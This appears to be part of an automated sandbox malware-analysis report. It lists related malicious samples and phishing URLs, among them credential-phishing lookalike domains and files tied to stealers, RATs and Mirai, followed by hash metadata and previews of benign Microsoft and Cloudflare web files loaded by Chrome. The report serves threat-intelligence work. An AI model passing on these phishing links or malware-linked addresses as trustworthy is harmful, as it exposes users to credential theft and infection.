                                                                                                                                                                                                          • 104.16.155.85
                                                                                                                                                                                                          Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                          https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 172.64.151.8
                                                                                                                                                                                                          x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 104.31.160.246
                                                                                                                                                                                                          https://securedacusa.com/?verGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          LicEPbnX.txtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.201.53
                                                                                                                                                                                                          https://token.onelogin.com-token-auth.com/XaG85eisvN2J6eWdNYXJ3OHhob2wwZFRQU0t4UUM5WHRUU0dNZ1dqV2crZ1dhV08xQTdUMW1hVmJaZURncldCRkRMZnJpMEpOWDR0djZiNXNLTGhTTUZBMWVFVDZIMFFXeU5qREJ1TUU2ZGQrVFhKQm8vYVVRMzF4Z0JQWkpibWJ0L3Bxc3NtS3h0dVdUcFBMYjlyTkJPbE5WSHdJcDRzQjJnaDNvLzc0SE52dU84MHQwcms1ZityVDBtYmlXdnB2K2c9PS0tZ2ltaTJwNGIyZ1VQeXpySC0tWTd5ejJuYnVpcFF3MkFkcXhOdUo4Zz09?cid=2323041528Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                          • 104.18.87.62
                                                                                                                                                                                                          FSCPlugin06.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 104.21.76.144
                                                                                                                                                                                                          FASTLYUS1.eGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                          https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://payment-gateway.horizoncloud.com/api/hpay/payment-link/payment/9528d20e-10a3-4245-92c0-ceae8c656055?zipCode=&showTip=FalseGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.66.124
                                                                                                                                                                                                          Review_Approval_rocjr.pdfGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.66.137
                                                                                                                                                                                                          vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                          • 185.199.110.153
                                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.129.181
                                                                                                                                                                                                          CLOUDFLARENETUSphish_alert_iocp_v1.4.48 - 2024-12-11T151927.331.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 172.67.176.240
                                                                                                                                                                                                          jew.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.16.155.85
                                                                                                                                                                                                          Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 104.21.67.152
                                                                                                                                                                                                          https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 172.64.151.8
                                                                                                                                                                                                          x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 104.31.160.246
                                                                                                                                                                                                          https://securedacusa.com/?verGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.18.94.41
                                                                                                                                                                                                          LicEPbnX.txtGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 172.67.201.53
                                                                                                                                                                                                          https://token.onelogin.com-token-auth.com/XaG85eisvN2J6eWdNYXJ3OHhob2wwZFRQU0t4UUM5WHRUU0dNZ1dqV2crZ1dhV08xQTdUMW1hVmJaZURncldCRkRMZnJpMEpOWDR0djZiNXNLTGhTTUZBMWVFVDZIMFFXeU5qREJ1TUU2ZGQrVFhKQm8vYVVRMzF4Z0JQWkpibWJ0L3Bxc3NtS3h0dVdUcFBMYjlyTkJPbE5WSHdJcDRzQjJnaDNvLzc0SE52dU84MHQwcms1ZityVDBtYmlXdnB2K2c9PS0tZ2ltaTJwNGIyZ1VQeXpySC0tWTd5ejJuYnVpcFF3MkFkcXhOdUo4Zz09?cid=2323041528Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                          • 104.18.87.62
                                                                                                                                                                                                          FSCPlugin06.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 104.21.76.144
                                                                                                                                                                                                          FASTLYUS1.eGet hashmaliciousDanaBotBrowse
                                                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                                                          https://newdocumentsproposal.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://payment-gateway.horizoncloud.com/api/hpay/payment-link/payment/9528d20e-10a3-4245-92c0-ceae8c656055?zipCode=&showTip=FalseGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.66.124
                                                                                                                                                                                                          Review_Approval_rocjr.pdfGet hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.66.137
                                                                                                                                                                                                          vFile__0054seconds__Arkansas.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                          • 185.199.110.153
                                                                                                                                                                                                          https://owotabua.cloudfederalservices.com/F3A4kGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.2.137
                                                                                                                                                                                                          https://18QDy4sM2G.lomidore.ru/baSDU4o/#Daccounting@harborwholesale.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                          • 151.101.194.137
                                                                                                                                                                                                          Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 151.101.129.181
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          No context
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):48316
                                                                                                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):953770
                                                                                                                                                                                                          Entropy (8bit):5.080381954635994
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:0SovLkCUeECXJs+vpuwOJkhrDHDehRGOY6U+v:0SovLzUeEPwE2rDjaRGN+v
                                                                                                                                                                                                          MD5:9671E1EB7537E97AD6DDF9679E4B7F5B
                                                                                                                                                                                                          SHA1:E378803DD7FEA0572A3EE5E7A2CD29B600149F81
                                                                                                                                                                                                          SHA-256:D70EED0D6E418A88047320FC6901F388EACD41A01C36BDE81BCA0B4B835D63CC
                                                                                                                                                                                                          SHA-512:6403FAD24ACE4FD89DFEE63FEF435018B231ADEC1361E424B2E001600D6D2CAFFF2D558711F84DF7F0C71D8A57AC18591DDE09FB04459B32478E429AE3CA29B3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Preview:var hashMappings = {"externals/cropper.min.js":"externals/cropper.min.9ac0771baa31494bfe06.js","externals/cropper.min.css":"externals/cropper.min.17d618a8ac3852a1dd52.css","externals/cropper.rtl.min.css":"externals/cropper.rtl.min.17d618a8ac3852a1dd52.css","externals/d3-array.min.js":"externals/d3-array.min.9cd24b33bb7b80954d50.js","externals/d3-geo.min.js":"externals/d3-geo.min.8f1383dda790ffaf106a.js","externals/es6-promise.min.js":"externals/es6-promise.min.745b2696c3736a0d5997.js","externals/filesaver.min.js":"externals/filesaver.min.2af19bece58e62d47b2c.js","externals/httpPostMessage.min.js":"externals/httpPostMessage.min.f27a458ec36590f79128.js","externals/jquery-qrcode.min.js":"externals/jquery-qrcode.min.f9add3f43dc8a49562ba.js","externals/jquery-scrollbar.min.js":"externals/jquery-scrollbar.min.e49ee35b605fbb9d1af5.js","externals/jquery-ui.min.js":"externals/jquery-ui.min.02de7165092644634e71.js","externals/jquery-ui.min.css":"externals/jquery-ui.min.60b2fc2bc042fc6831db.css",
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):95311
                                                                                                                                                                                                          Entropy (8bit):7.997438387043729
                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                          SSDEEP:1536:Z8PjmCORtCrmmGRU8yqoaJO2uo4zfwxOGSzM0LMwjj0/1Hsf3WOs9UT5Lr6G8C:GPjmCORHPBQhzfVGUM0LMyg/RgmOsGLh
                                                                                                                                                                                                          MD5:A7A9E6CBAB851D6C4FF7F1580AC4D59B
                                                                                                                                                                                                          SHA1:8D7977AC3DE83FA9D2F092014B2BAB5D9CD21A91
                                                                                                                                                                                                          SHA-256:21949E46BF9A44701305C67CCA16393CC08ED417A0DC748563CDE55A80809663
                                                                                                                                                                                                          SHA-512:44645AEE721AA1CBFA81F537A8A9350C333477E36D15362A2A18BC5DD9F6A26F65F0DEB7D01D322C63D4FFC4290B85F564A5CE128B90CA2687EE7ED8D32D6F77
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBICapabilities_1.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................-...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................5mdat.....*..%....B2...D$..A.P...E....qE.R...B...K.....2...5{.......U.^zu....l...Ps\.....Ec7..J.......Km<H.l..^....-=?.......f...T..-Sh;{k$......%E.H^...,......\...t.t........X".m._...3.....~..../..~/....X.J0..S....K.b.=P. ._.T.p.n..P...............^.[..s..]..qR9..E.....i..N`..@kH.beS........s..f..t..v |...;....:j.......!G...?@^.N@.;.............J..h.}....l.+P.e86.8>...qv.TZ...<r;...Y'...._...]X........5G.?..O..?....E.....\c....g......o.l.>4.0|5...q....<|.|P8j.qP.....~.~..n..gs.......S.$..e7.G.#..#.D.........y..U....I.~R..E..YvT....c.-~..woo..Tc?m...-....,l%.!.....4..._9_vD2....S.%G....'N.m_2.Fz..]8....j.wI....7.z*7E;.j"8.5w.......#.x}.Bf8.............J.+.|Ru)@..pQF...VH.9..K.%
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (526)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1683
                                                                                                                                                                                                          Entropy (8bit):4.981226266363334
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:vvJ/iwjBViZF/HGbP4aSnlS9DT/PY11oBJ:nJ6MTmF/HegaSMZ
                                                                                                                                                                                                          MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                                                                                          SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                                                                                          SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                                                                                          SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                                                          Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):2436
                                                                                                                                                                                                          Entropy (8bit):4.675816652909621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:sebcrpamZrX1/W4/PiIgpzCzj12SoOTj+/3cuq2VqP:seslX1/WIks1Ho8+P1qt
                                                                                                                                                                                                          MD5:3473C7D90BD072EDEE7D20686EB3FD28
                                                                                                                                                                                                          SHA1:82BF670C4E5D3DCF7E4BD8BCAC92A6EED0E87E45
                                                                                                                                                                                                          SHA-256:553B9C191998B0EA72FC6711D6F572C69A812531602EA8C6FFA0F188DFD36423
                                                                                                                                                                                                          SHA-512:974833D87C6295CA5CF485D1B7FE0F88B736F99803F893D858A048B00578D6FEC47A750FA75A4756CDD20571C4DDA0F8BA323E42C70D53E2998BAE61E5D9E33C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-ajaxutil.min.ACSHASH3473c7d90bd072edee7d20686eb3fd28.js
                                                                                                                                                                                                          Preview:class AjaxUtil {. constructor(opts) {. // Define the base URLs for different environments. const AUTHOR_BASE_URL = {. nonProd: "https://msonecloudapifd-nonprod-adg7arhndebhe8hd.z01.azurefd.net",. prod: "https://msonecloudapifd-c7cndkdmc9c3d7e3.z01.azurefd.net". };. . // Flag indicating if it's an author or non-author environment. const isAuthor = opts.isAuthor; . . // Flag indicating if it's a production or non-production environment. const isProd = opts.isProd; . . // If the 'host' option is provided, use it as the authorHost value; otherwise, select the appropriate base URL based on the isProd flag. const authorHost = AUTHOR_BASE_URL[isProd ? 'prod' : 'nonProd'];. . // Set the nonAuthorHost value as the origin of the current window. const nonAuthorHost = window.location.origin;. . // Set the baseUrl value based on whether it's an author environment or not. If isAuthor is true, use authorHost; otherwise,
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):424
                                                                                                                                                                                                          Entropy (8bit):4.933461267592602
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:trLnU/iyKu5zBOKPWzUqokxJj2D54GxAEBEh:tPnU/Cu5sKMJJ8AEKh
                                                                                                                                                                                                          MD5:C7B06D2C5A8D4232A7AABCA94811C468
                                                                                                                                                                                                          SHA1:5198A33544ADCB248C44BBA46A0B0F199EBB773A
                                                                                                                                                                                                          SHA-256:BD49A09567E62361A0B461C615A7EA2BC991C3DB540B95540C527B2FCBBE79FA
                                                                                                                                                                                                          SHA-512:A198F51C6BE738D50FF3F7A10E17380AC152967EFC104D88150C3D652267357863E8E343AF7C833A49A358858E42D64BAA4391C1DEE73132945AC0224784BDFB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g opacity="0.75">.<path d="M23.166 21V22.5H2.91602L2.16602 21.75V1.5H3.66602V21H23.166Z" fill="#0078D4"/>.</g>.<path d="M23.166 7.14669V9.26919L20.0415 6.14919L12.2415 13.9492H11.178L8.37452 11.1442L3.66602 15.8512V13.7302L7.84352 9.55269H8.90402L11.7075 12.3547L19.5075 4.55469H20.568L23.166 7.14669Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):39
                                                                                                                                                                                                          Entropy (8bit):4.2504143220263435
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:6JRASKDeI+CK9To+:6fAveIyTo+
                                                                                                                                                                                                          MD5:D66C468F4CA17E83CCD97A4518B3E814
                                                                                                                                                                                                          SHA1:2E657440F653DA65E699AC9230D82FAEE414D8A5
                                                                                                                                                                                                          SHA-256:8E1CE663720F6AFB2DEE29B587D3F7559EA89BC622F966120C9F108172A5C866
                                                                                                                                                                                                          SHA-512:FC012A375F871892839D547D3FB3D38B58C2542B0F32FB005A7CADCA7ECD676D1626F3CE79E2DD24890B02162EF7C2B8A877049CE7865B9B83C7FFDA9C40FBBF
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-aem-styles.min.ACSHASHd66c468f4ca17e83ccd97a4518b3e814.css
                                                                                                                                                                                                          Preview:.xf-content-height{margin:0 !important}
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                          Entropy (8bit):5.401573598696506
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHBzZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUvnw81KZLGcD:IGJWHBzZBF6xbGeLsVvQ33FUvDW
                                                                                                                                                                                                          MD5:B0B3774E70E752266B4CF190E6D95053
                                                                                                                                                                                                          SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                                                                                                                                                          SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                                                                                                                                                          SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f9063374b04d/api.js
                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5006
                                                                                                                                                                                                          Entropy (8bit):5.254875250489264
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tYVv5eMnTpQA9CsC9MCCu2Axzwxf1QiEbyhTlZhZF4ntl:tOwMTpP9jUnN2Izwxf1hhTNZF4ntl
                                                                                                                                                                                                          MD5:2954890B89E77EADECA4558085241308
                                                                                                                                                                                                          SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                                                                                                                                                          SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                                                                                                                                                          SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Web Open Font Format, TrueType, length 30557, version 5.655
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):30557
                                                                                                                                                                                                          Entropy (8bit):7.984832028410297
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:KM2UwV+GA2pr5SW3TYwTe8FSzU6ly0mkLVIIZ4b9CO:K7JX8ue8FSzUt0dVIIZex
                                                                                                                                                                                                          MD5:F6BEB9762F6976C6A1C23010DA3258CD
                                                                                                                                                                                                          SHA1:83B7261D0E6F3994ED6DAA6C5856049F7F599968
                                                                                                                                                                                                          SHA-256:3859434608F281A7CAC3BAD36F788A8D900C26491D1E10B68210188336DA9B5E
                                                                                                                                                                                                          SHA-512:734CF481522876606C39C1A9B65BC86CF35FBF5D4CC09930BC3299E61FB0EA92C1A4352CAC6FD95262FFA7C4AF930A5F0AB35BD6B6771A1FE990EDD701CD4192
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/fonts/SegoeUI-SemiBold-final.5d342bdd691571ad2432.woff
                                                                                                                                                                                                          Preview:wOFF......w].......8......u.................LTSH.......~........OS/2.......V...`K.xxVDMX...l........vX}.cmap.......i...V3u..cvt ...X...x....c._.fpgm...........5.KV.gasp................glyf......Ay..`P'.b.hdmx..R........p.EGvhead..[....6...6.{..hhea..[<... ...$.!..hmtx..[\...`.....BU.kern..]....(.....6.xloca..l...._........maxp..oD... ... ...lname..od...l...4....post..q........ .Q.wprep..q.........[...x.UNA..0..N;.PHa^FgSSH...w..)i.:.. ....{.&.....c..1R.yI..v..y.. 5..y.K).Es..........5...j...+.8..Q..#.dWQ._.{..t..G.|......+..x.c`fqe.``e.`..j...(.../2.1.q.2q.3..!.s...>.{1@.o......k.z._ #/."&& ..$...:.H)0....:.O..x....x.........v..r..M..9"..#7.\!wH.$w..9r.....f6ffc.a.63...1._o...<...A.?|..0<..x.%.\..>..+._...^....,@A. ..;..(,....=....E(&.R.S...}J..%(m....,EYY.r..2.e)/?..,GEY.J...T..."+Q.r.L5Y..*5,.j..RKV....Z.:..Z...'?...C.{L]..z4..i,..6..e...c...4.G4..lJK.V.....-h#?..lI;...ek:.6t.m.d....lO.....|@'.....;.Cv...J/K.........ki....I.....k...}.2H.s..`K.........f....r.#.W.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):126398
                                                                                                                                                                                                          Entropy (8bit):5.3715099302912686
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:IsRNf1YDV1L3IwZvBZFjbUD5v8+qvxFjUymAC5PnChR2bhfzKp:PRcQm+qvxF9mA0PDhfz4
                                                                                                                                                                                                          MD5:3093A8F2176C92CDE72712378C933EEF
                                                                                                                                                                                                          SHA1:DA736F4A7E9E066A152B4E8A99D145066E812FDF
                                                                                                                                                                                                          SHA-256:3F68F5E5FC3D6300F4EDC10FA99F4C1765CB29CAB31D0B79A94250733D0731A1
                                                                                                                                                                                                          SHA-512:2A1F5B2F53D09462A46043C733B35F46833A29657CD09ECF528F72BB74A6EE503F3253785085F059F29B30343FC8E888A4CA36C927D1A1D6F4B39F9C69339829
                                                                                                                                                                                                          Malicious:false
